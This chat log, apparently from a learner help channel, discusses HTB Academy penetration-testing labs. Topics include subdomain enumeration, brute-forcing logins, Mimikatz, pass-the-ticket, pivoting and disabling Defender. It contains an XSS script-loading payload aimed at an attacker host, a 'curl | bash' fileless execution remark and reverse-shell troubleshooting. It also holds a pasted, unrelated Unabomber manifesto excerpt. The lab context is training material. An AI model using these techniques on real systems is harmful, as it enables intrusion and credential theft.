hope I posted this question in the right place. thanks in advance

no need to download a plugin. See what you can do with your current access

okay I'll look again thank you!

Who is willing me to help with active subdomain enumeration? Becouse i cant figure it out

Ok so I just wanted to checkout the academy and see what was there. I just opened linux fundamentals. And they want me to give the command to start a http server using php

Now I know how to do that.

And I even verified it on my own box for a sanity check.

lmfao

bro my sanity has already dropped with 60% with doing this stupid task

@grand harbor Yeah what about sub?

Yeah pisses me off

well so i have to find sub domains

ENDLESSLY

Ok

so i use the commands i learned in the modules

and i just doesnt work

what tool are they using?

nslookup

🤮

wait

what

You can use dig

That an option if you dont wanna fuzz

https://www.youtube.com/watch?v=SAKEem9yIB0

So this is your box?

Right

The kali

ye

hosts

i found the nameserver with dig

Add to your host file

the name server?

I think you are asking the wrong resolver.
You have to specify the resolver 😉
Take the IP of your target

yes thats what i did with dig

i did dig ns <target> @rustic sage

htb is not a valid top level domain.
It can only be used internally.

add it to /etc/hosts

The name server?

ip and server

becouse it says that the namserver is 127.0.0.1

ant thats me

It will ask you

Since htb is not a toplevel domain as bunny pointed out

But it will resolve if you add it to the hostfile

yes its internal right

alright, why dont they mention it in the first place

becouse theyy mention it in the previous tasks

Either way, it's too buggy

Press Ctrl-C to quit.

Just started the frakking http server

Still the answer is wron

fun

hahaha

your sanity is getting hard checked in the academy

127.0.0.1 is always you 😂

wow, I feel the rage

I mean you could normally argue that I dont know what I'm doing

😂

btw

i completed the questions

and?

You just had to add it to the host and dig?

When it comes to subdomain enum further down the line. Use amass, learn it from the start

ffuf is also good since it's written in GO and thats some nice network speed

not even

just zone transferd a internal dns

ohh

kek

was so ez but nothing to do

with the instructions i red

So wait. They wanted you to make a zonetransfear

How far are you in this module that I assume is called DNS

You have several types of transfears as well.

im doing the web information gathering

where the hell do i find vhost list in seclists

​​​​https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS

Yeah I'm going back to my box

how do i make a space in a url webshell

%25 i think

%20

sorry

non braking space is %C2%A0

Hello, I have a question about something in the Introduction to Active Directory module,
in the AD Administration: Guided Lab Part I section, and in the Task 3: Manage Group Policy Objects.

We are asked to duplicate a GPO, modify some user and computer settings, and then link it to an OU which only contains user objects.
I know this task might have for goal only to practice and navigate in the GPOs settings, but isn't it strange to modify and enable computer settings even though there is no computer objects in the OU ? Since because of that the computer settings won't be applied.
Wouldn't it confuse people ? Or am I completly mistaken about how GPOs work ?
Thanks for the answer.

Did u finish jt

Need help on attacking lsass under password attacks, im unable to transfer the file to my attack machine

there is no vhosts, its a wordlist htb used as an example, use ||/usr/share/seclists/Discovery/DNS/namelist.txt||

Ye got it thanks

Hi
I need help on the module Stack-Based Buffer Overflows on Windows x86 -> skill assessment part.
i found the offset 4**, check for bad char (found 3 chars), and get a jmp esp addr in funcs.dll (0x62******).
But its not working, the program crash but nothing happen... i am completly stuck and can't find what i missing out.
Please help 🙂 thanks

*offset : 4xx

Hey all. I have a scope question:

Going through the Server-Side attacks module. NOT LOOKING FOR SPOILERS. I'm on the final assessment and for the target, they give you a url in the format of <IP>:<PORT> to attack. Is it safe to assume that the scope of this engagement is limited to that port for initial recon or would we be allowed to run an NMAP scan on all the ports for that IP?

UPDATE 50 minutes later:
Figured it out. I was totally overthinking it. This was an easy one if you just walk the app manually looking at everything in Burp and go from there.

Read file transfer module on how to transfer files

Hello, for the module Cross Side Scripting (XSS) - Session Hijacking: The module itself sets a php listener on 0.0.0.0:80, which is already in use for my pwnbox. Let's say I wanted to change the listener to 8080 for instance, which is free, how would the XSS command change?|| <script src="http://myIP:PORT/username"></script>|| for instance? Can someone give me a hint?

💀

i need help with broken authentication skill assessment

lmk if can dm some1

Yeah?

Just say it here

i found support.it and support.us users

i couldn't find any admin users

and I don't know if admin user exists..

what to do next

i have passwords for support.it and support.us

i narrowed it down from rockyou using grep and regex

You did try brute forcing for a admin username right

yep i got many correct user names

like admin, finance, support

So you tried them all and got nothing?

with .cn .gr. .it .us .uk

i tried to brute force them with wordslist

i narrowed it down from rockyou using grep and regex

but i can only find passwords for 2 users

support.it and support.us

i narrowed down passwords words list to 40 lines

and sprayed those passwords with valid users

only got 2 users with valid credentials

im doing something wrong here but i don't know what

Did you try other methods of gaining access to the server

I'm going crazy could I get some advice on Module Footprinting section FTP what should I try when I recieve "try being more creative"

Like ssrf or whatever

I'm using some serious scans here and still getting nothing

i got the cookies and decoded them

Like what

came down to md5 hashes

What did you get?

support.it:support

i changed support to admin and used that cookie but it says user cant have requested role

OSCP automated scan gives

• All cve vulns
• UDP & TCP
• Services and version
• Directories
• Service users and suggested logins

still cant enumerate the FTP banner

I got the flag for the FTP user already

🤡

That should be more than enough

Still isn't :/

Did you find any cves

Btw

Yeah

But the question is " Submit the entire banner as the answer."

I dont have the whole banner

I might move on this seems like a waste o time

At this point I have no idea how to help you

you solved the skill assessment right

point me in the right direction

i dont mind spoilers

I didn’t

I’m just helping you based on my knowledge

oh okay

Wait

Did you find any cves on the website

Am I suppossed to find CVEs as apart of the banner?

Probably

theres a cve scripts on nse

But since you want to move on I won’t pressure you

I just like to finish the modules as I go instead of going back to them

Ok then

I prefer to anyways

@primal silo

I remember there was a method to help bypass that in burpsuite

But I can’t remember what rn

Hey Guys, will I still have access to the modules I have completed after I cancel my membership?

Module Footprinting Section SMB: Hey is CIFS only for Samba or can it be used on all SMB servers?

I dont think so

just take very good notes with obsidian

Hi, I need a hint on how to phrase the answer in Command Injection " Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?". I tried all injection operators url encoded and not encode and found a few working ones. If I just put them without any separator in the answer, it doesn't work

can 1 dm sm1 i need help with broken authentication module

I've been hard stuck on module Active Directory Enumeration & Attacks, AD Enumeration & Attacks - Skills Assessment Part I, Question 6 Submit this user's cleartext password for hours.
||I also posted about this problem yesterday and was hinted to use Mimikatz.exe. Problem is I still can't find the password. The forums also point in the direction of using Mimikatz.exe. I even opened my first ever ticket with HTB because I believed there where a bug in the lab, but they confirmed there are no bug and I need to do something else.
Please help, at this point I just want to know how to find it so I can find out what I keep doing wrong.||

Anyone that can help me with this Nessus excersise

nessus*

Is there a specific place that shares/files go once you "get" them from an SMB share?

it was a directory my bad

I'm stuck on the linux privilege escalation module- credential hunting. I've obtained root user, yet I still can't find the wp-config.php file. I've used the command find, but it says no file or directory found. Can I have a pointer in the right direction on how I can find wp-config.php?

have you tried ||| find / | grep wp-config.php||

that worked! Thank you so much!

Hi
I need help on the module Stack-Based Buffer Overflows on Windows x86 -> skill assessment part.
i found the offset 4XX, check for bad char (found 3 chars), and get a jmp esp addr in funcs.dll (0x62XXXXXX).
But its not working, the program crash but nothing happen... i am completly stuck and can't find what i missing out.
Please help 🙂 thanks

i didn't use Mimikatz for this but a just give it a try with Mimikatz and with the right tag i can only dump the password not the username but try crackmapexec

Np!

I'm running into an issue on the last question in the Pass the Hash (PtH) section of Password Attacks. I've followed the hints provided in the forum for this section and I still can't seem to get the reverse shell to work. I've got my listener running and I'm using the correct IP address of 172.16.1.10 in the revshells.com site to build the reverse shell. I get the response of command executed with process ID 3084 on DC01 but nothing appears in my listener. Any ideas what I'm doing wrong here?

I ran into the same issue. Mimikatz did not show the password. After resetting and starting again, the password was shown when running the same Mimikatz commands.

I figured out my mistake with some help. The revshell should have the IP as your listener. Also, make sure to copy and paste the result from the revshell site instead of copying and pasting the example in the lesson. It turns out that they're different.

https://giphy.com/gifs/rickandmorty-season-1-adult-swim-rick-and-morty-TJgotk8MoedYFsvuYz

Can any one help me with pivoting module assessment im stuck at loggin into dc

I'm on the next session now. Pass the Ticket (PtT) for Windows and I'm not able to remote into the target using the provided credentials? Has anyone else seen that before?

I tried xfreerdp, evil-winrm and impacket. Nothing works to gain access to the target with the credentials provided.

Hey team @carmine kiln @winged hedge - Currently doing the 'getting started' module of pentesting, on the 'Public Exploits' session. And the exercise I have to do with the target machine says "(server may take a few seconds to start)". But I have started two of them so far and still cant get it

The first step of the exercise is that I have to identify the services running on the server (and on their ports) - but I can't even get a ping response from the IP, nor my nmaps are working against it because the server "seems down". I don't know if I am doing something wrong or if it has to do completely with the disclaimer shown before.

(I tagged the mods cause I thought that's the way to go, but if anybody else reading this has some input I would appreciate it)

are you sure your vpn connection is ok ?

I believe so, have my VPN on and have been able to do other things - Also tried to use their own VMs and still doesn't work

restart the target machine and try again

wait 3 minutes after it starts befora interacting with it

how go it get the"Academy User" role here 😄 ?

how do i get *

Looks like you found it? 🙂

look like i did

but i dont know why xD

just appeared xD

I think its if you get a paid subscription

I only got cubes so I dont have it

I had some help figuring out my issue with RDP'ing into the windows box in the pass the ticket for windows section. When you use xfreerdp, don't put in /p: and the password. Let it ask for the password and you'll be able to then get in.

I really think that should probably be mentioned.

#welcome

i need help with linux privilege escalation skills assessment. It says for flag1 i must enumerate all the files of the user, but i went through every folder of htb-student and can't find flag1. Any tips?

Hidden directories/files too?

yes, i did ls -la

I haven't done that one, I suppose it might be worth trying a 'find' with the username htb-student. Assuming htb-student owns the file with the flag.

Thanks! It was meant to be completed other way rather than scanning. 💀

I'm struggling with finding every single one of these flags except flag 2

FYI:

https://academy.hackthebox.com/module/77/section/727 has a bad "UnderTheWire" link (no biggie, but easy fix)

hi. I finished web requests module. in the command line everything was smooth, but in the browser, after authenticating with the proper cookie by replacing in a storage section of devtools, and getting to a search page (in POST section), after search attempt I had completely different results, and no okeyed POST with search.php showed up at all, but many others. my page reloaded instead of showing a result. what happened? the app works properly cause I could do all requests I wanted through cli.

hajao mizki

Hello guys

this may be a silly question but some of the modules in the Penetration Tester path have a publicIP:port and on those certain boxes I have a hard time using nmap or wget is there an option that I am missing?

if you check the help or man page they will show you options for ports if they are not the standard port. for nmap you can use -p to check all ports between 1 and 65535

thank you I will check that out

that PtT Linux question 8 was rough

anyone got issues with the module?
PIVOTING, TUNNELING, AND PORT FORWARDING - SOCKS5 Tunneling with Chisel

when i tried to run chisel on the ubuntu (pivot host) it gave me this error:
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel)

Download older version of chisel 🙂

Thanks! it works

Were you ever able to solve this? I'm stuck on it myself... Can't figure out the proper query. Feel free to DM

can someone give me a nodge on Footprinting lab medium, I am stuck at the begining

anyone managed to install "SocksOverRDP-Plugin.dll" in RDP and SOCKS Tunneling with SocksOverRDP module?

the dll keep disappearing after i extracted it out

Turn of the defender with the power shell command and it will work

MODULE: ACTIVE DIRECTORY ENUMERATION & ATTACKS

In Attacking Domain Trusts - Child -> Parent Trusts - from Windows - Q3:
Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.

I am able to see the content of the C drive, but cannot move forward to see other folders and files in it.. any help?
When I try to get sub-directory - it says cannot find path.. dir \\academy-ea-dc01.inlanefreight.local\Users

Thanks! disabled the R-T-M

Hey I need help for Attacking Common Services > Attacking Email Services I have found m**** user but coulnd't find the password I'm thinking of hydra cannot be used as they said in the module. Need help its been too long I'm stuck in this

Why can Hydra not be used? Use Hydra.

In nmap "module/19/section/103" there is a question asking for a flag by checking on services, i got the flag (robots.txt) but it says wrong answer?

I tried reset the machine also, but the flag doesn't accepting
Can anyone help me with this.

I figured out thanks!

Linux privilege escalation -> Shared libraries
I don't understand why this isnt working. Doing just like the academy says and yet I get errors?

Welcome to the htb academy😂

I did manage to solve it by just ignoring the errors apparently they were fine as they were, just annoying that they didnt show up in the academy output so would have known they were supposed to be there lol

Hey 👋 guys I am just getting started into this HTB course. Can anyone help me with this error
ssh: connect to host [ip] port 22 : connection refused

Why it's give me wrong it's in into to network traffic analysis

try 443 56282

without the .

ادalso not working

443,56282?

or 443, 56282

refresh the page

hi I'm in Attacking DNS section from ATTACKING COMMON SERVICES module, I'm bruteforcing utilizing this command gobuster dns --domain "inlanefreight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt and only found ```Found: ns.inlanefreight.htb

Found: helpdesk.inlanefreight.htb

Found: control.inlanefreight.htb``` but any of them contain the flag what wordlist should I try next?

What module? If you have to SSH, is SSH open? Is it open on port 22?

attacking common servcies, attacking sql database
i could connect to the database and see the flagDB database, but have no acces.
can anybody give me a push in the right direcrtion for the two questions there?
What is the password for the "mssqlsvc" user?
Enumerate the "flagDB" database and submit a flag as your answer.

dm me

So, I'm doing Interactive Section with Target. I spawned my machine, and tried to access firefox so I can view http://157.245.40.149:30655. I can't. I get a timed out error. seems like my machine doesn't have access to the internet , in fact I can't even access the bookmarked taps.

Is there a reason for that?

curl http://157.245.40.149:30655/ gives me a time out as well

does anybody know a way to automatically check Payloads for LFI. I'm in module File Inclusion, Automated Scanning section, I tried with burp suite, and tools I could find on the web but none of them works.

Also wrong

i think you have to add the IP to etc/hosts file

on their interactive machine ?

im not sure but i i think that for some machine ip's to have access you need to add the ip to the etc/hosts file on your machine

then your answer is wrong

I'm using a spawned machine. it seems like Firfox itself can't access the internet do to the firewall

maybe try to restart it if you can i haven't used it till now

Restating doesn't work sadly , I tried it. maybe I need to connect it to openvpn

but again, how do I get the .opn file in this target machine

i think its enough to have the vpn open and working on your machine

which I do

try to restart the vpn maybe

maybe this challenge is bugged ?

I tried that

It is mentioned in the section that "hydra are usually blocked"

free users on academy don't have internet in their workstations

the target can be reached over the internet, if it doesn't work in the workstation for whatever reason, feel free to open it in your browser

I tried to open http://157.245.40.149:30665/ on my browser, however I get the same response, "connection timed out. If I get a subscription will this be resolved

So, this is a subscription issue, makes sense.

I did that section a while ago, but I believe it does recommend other tools for spraying O365, Google, and/or Okta environments

reset the target

I did

i dont know wich question are your trying to solve, but on these module try also the dev.inlanefreight.htb domain and the fierce... wordlist

What are you talking about friends?

there was a confusion with other module from my part

Bro I'm not getting with o365 or CredKing

Which problem you have?

I am not able to find password for the user m**** from the Attacking Common Service > Attacking Email

attacking common services easy i know u can ||upload webshell with mysql & ftp|| but it doesnt seem like it does that at all.

use username with the domain

eg. hydra -l user@htb.com ....

at least as i remember

I tried like that in hydra and in o365 both but got the same results

i did that just now. both with rockyou.txt & password list provided in resources. they work. maybe a typo?

there are 3 mail protocols u tried BF all of them

What machine do they make?

you can use wfuzz

In what sense do you mean?

No worries got it finalyyyyy

ezz

Which modules on HTB Academy do you think it helped for OSWE prep? I'm currently doing CBBH path in order to prepare for OSWE exam and also bought the Blind SQLi module, but I would like some advices on which modules from the tiers III and IV would help me most.

Guys need some help 👀 🚨 🔥

So I have connected to the RDP and I have found the users then I have found the important.txt file but when I try to connect to the SQL is giving me error. I have tried the whole string and also have tried the string without the "sa:" but still no access.... I have tried all accounts with that password and plus "admin:admin" and so on.... I have tried with the sa account as well.

have you tried connecting at the MSSQL DB from kali/parrto using some tool like sqsh or impacket-mssql ?

Transfer chisel to the target and made a reverse socks5 proxy, so you 'll be able to interact with the target from your attack OS (kali/parrot), then use some tool to interact with the DB like I said before.

And assure you have the correct credentials

Have you been able to figure it out yet? I have been stuck at the privesc piece for a while now. Haven't found anything that I don't already have for the initial user login.

The privesc one in the getting started module?

The Password Attacks module, Lab Easy. Question is asking for us to provide the root password. I scanned the host, found my way in. I went through all the items in Linux Credential Hunting. Looked for weak configurations "/etc/shadow", but haven't been able to find anything.

Nvm:

I reset the machine, ran an enum script I made a while back and found it. hahaha

nope -- doesn't work for me 😄 🤯

the Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries

Hey guys. I have a question regarding filetransfer module -
I have created a script (bash - through time) -asking 3 questions. Normally Manual done with wget FILE - chmod - execute. using read to collect the manual input.
Then Trying to do it with curl FILE | bash - like fileless attacks - It do not ask the 3 question (can see the txt output is asking) - but the script just continues- and fails carse the missing user input.
Is it because of the read command in bash is not working
EDIT --> solution is read -p ANSWER < /dev/tty

May I get some help with Pivoting, Tunneling, and Port Forwarding - Skills Assessment Question 3?

I attempted to utilize ssh to dynamic port forward with the found id_rsa file as found user on the webshell but receiving the following error. As the ssh_config file is owned by root I am unable to edit the file to try to make it work.

Am I on the wrong path?

Guys, any tip on Password Attacks -> Credential Hunting in Linux? I logged in as Kira, but can not find Will pass. I cracked the archive but there is only the HTB flag, not the pass. For FireFox I need the master key and in Kira home directory there is only ssh keys for same user.

If you're still stuck try using ||metasploit (meterpreter section in the module)||

Has anyone here used SET?

Congratulations

@austere osprey dm me I just did that one

Yes i solved it, still need help? Send me a DM

Got that to work and get me the answer. Thanks @opaque niche !

hi anyone can help me with ZAP Fuzzer section from USING WEB PROXIES stuck in this question The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists. Tried generating md5 cookies utilizing the provided wordlist then used burp intruder and repeater as I dont know how to use properly ZAP proxy, but got nothing, what should I try next?

Hey, a newbie here and im struggling with finding my VM IP in XSS module for /phishing section. Im not using a vpn so it means when i use ip a command i should copy the ip under eth0 and not tun0. But when i paste it into the required place within the code it doesnt happen what its supposed to happen. Pls help

should be like 10.10.15.42 or similar

Under tun0 or under eth0

?

I dont know but I think under tun0

The support told me under eth0 if im not using vpn

And im not

But i tried both and it didnt work

do you have ens224 or something like that?

Do you have any interfaces with an ip like the one I listed

Uhh i dont really know whats that bc my VM got terminated now i wasted so much time waiting for the support and they didnt answer me in time so

Ill see tomorrow

your vpn IP is assigned to the tun0 interface

if anyone has time, I need a nudge on a question from the 'pass the ticket from linux' module

dm

But why doesnt it work when i put it into the required field

i don't know what you have configured and what you are trying to do

I am trying to inject a login form

But i need the ip of vm

And it isnt working

Can you check it up pls if you have XSS module

this is a broad question if you want to ask your question, ask it, but it doesn't seem relevant to any academy modules so best to ask in #1024429874246590575 or asking in the relevant channel once you verify your htb account in #bot-commands

I'm having an issue using the ccache files to gain access to DC01 in the pass the ticket for linux section of the Password Attacks module. I've tried using both files for Julio and I keep getting no credentials cache found. I'm not seeing what I'm missing here.

Oh sorry, I can't find the channel for the questions

then you need to verify your http://app.hackthebox.com account in #bot-commands by typing in ++verify there; you will be DMed instructions on how to verify from there

literally just started, but anyone know the point of beautiful soup if you can just curl?
is it because it's python?

there's probably more options and stuff that make beautiful soup useful or more intuitive than curl

¯_(ツ)_/¯

https://tenor.com/view/adventure-time-marceline-wink-nod-agree-gif-5059701

hey

Beautiful Soup parses the response in to an object that is easy to pull data from. It’s handy when writing a Python script that needs to use data scraped from a site.

Still having an issue gaining access to DC01 in the pass the ticket for linux section. I tried using both ccache files for Julio. One keeps changing and the other is static. Neither work. I get No credentials cache found after exporting it to root and running klist. Any ideas what I'm doing wrong? I've tried restarting the instance as well and get the same error each time.

I've tried with my own VM and using the pwnbox. I keep having the same issue. Neither ccache file works. Could there be something wrong with this module?

I just finished this module...you need assistance

this is great 🙂

Hack the box

Mdr

Lol

Yes, I'm not sure what I'm doing wrong. I'm just starting up the instance again to clear everything.

dm me when you get to the point your having trouble with

Okay, will do. Thank you!

anyone have a hint for the Passwd, Shadow, Opasswd section where we have to find the root password? I tried running hashcat on the unshadowed file with a bunch of different wordlists and haven't gotten a hit

if i don't achieve a passing score or complete the exam how many days do i have to schedule a retake. when i went to register for exam only thing i could find about an exam retake is this:
If Participant completes the exam and uploads the answer but does not achieve a passing score for Certification, Participant shall have the option of retaking the exam one more time with the original voucher within 20 days from the date he is notified by HackTheBox of the result.

If a Participant does not achieve a passing score the second time, the Participant must acquire a new Exam Voucher.

It makes it sound like only retakes are available if you complete the exam(sdolve everything) but still don't pass.

nvm, figured it out

Hey, I was wondering if someone could give me a small pointer on Skill Assessment - Broken Authentication. Id greatly appreciate it 🙂

where are you at?

@shrewd cradle Could I DM and Ill send a print screen at my current step if thats okay?

sure

Thanks

May I get some help with Pivoting, Tunneling, and Port Forwarding - Skills Assessment Question 4?

I received a meterpreter session, ran autoroute, attempted proxychains xfreerdp with the found credentials in the webshell pointing to the found IP address for question 3 but getting a failed to connect error

#cpts message

hi peole im trying to import a exploit module on metasploit but i cant get it . someone has had problems with modules import ?

you can just put it in /usr/share/metasploit-framework/modules/folder and just call it from there?

b3r4 i just execute reload_all and its works fine

thank you

hey all im trying to user scanner/http/joomla_bruteforce_login in msf for a subdomain: test123.inlanefreight.local however when i use it it only shows this as the site its attacking: http://10.129.230.222:80/administrator/index.php - Failed to find Joomla Login Response as an error. how can i get it to go against the subdomain i've tried changing rhosts and vhosts to the subdomain but it still onjly goes against the ip

iirc the metasploit module didn't work for me, so I used https://github.com/ajnik/joomla-bruteforce

I tried that however it stops after trying first password and makes it look like it worked but it didn't. any thought?

Do you have the subdomain pointed to the ip address in /etc/hosts ?

yep

Then use intruder 😉

mercy meee lol ok i'll try

but intruder is slow as shit wish i ahd practiced more with zap

I'm trying out the ffuf module and am having an issue. Using the built-in pwnbox, I am doing the first interactive section. I can see ffuf working and running through the wordlist, but no matches are displayed at the end of the fuzzing.

What submask are you occupying with autoroute?

17.16.5.0

And what command are you executing in the meterpreter with the autoroute?

use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
Run

no lol, meterpreter > run autoroute -s|| try with ip/23 or/24 or /16|| or make sure the socks proxy is working

Sorry for the late reply

run autoroute -s 172.16.5.0/23

I have a question about running MSF's socks proxy..how do you background it? Seems when I "ctrl+z" it just kills the socks proxy

hey im stuck at the 3rd qus of this section
attacking enterprise networks module.
https://academy.hackthebox.com/module/163/section/1549

i tried to do all of the things but theres a problem that occurs and fails the task to run so i checked the log and am putting the log output here can anyone help me out?